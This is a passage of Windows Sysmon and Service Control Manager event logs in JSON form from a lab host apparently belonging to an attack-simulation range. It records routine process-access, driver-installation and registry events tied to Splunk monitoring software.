{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-001029D90500}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-001029D90500}","TargetProcessId":"4092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-001029D90500}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-001029D90500}","TargetProcessId":"4092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76858,"ProcessID":852,"ThreadID":940,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"A service was installed in the system.\r\n\r\nService Name:  npf\r\nService File Name:  C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nService Type:  kernel mode driver\r\nService Start Type:  demand start\r\nService Account:  ","ServiceName":"npf","ImagePath":"C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","ServiceType":"kernel mode driver","StartType":"demand start","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:51:56.410\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nProcessId: 852\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\Start\r\nDetails: DWORD (0x00000003)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 06:51:56.410","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\Start","Details":"DWORD (0x00000003)","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:51:56.410\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nProcessId: 852\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath\r\nDetails: \\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 06:51:56.410","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath","Details":"\\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.427\r\nProcessGuid: {E2A3D6B1-110C-5F25-0000-0010A0E80500}\r\nProcessId: 2664\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows 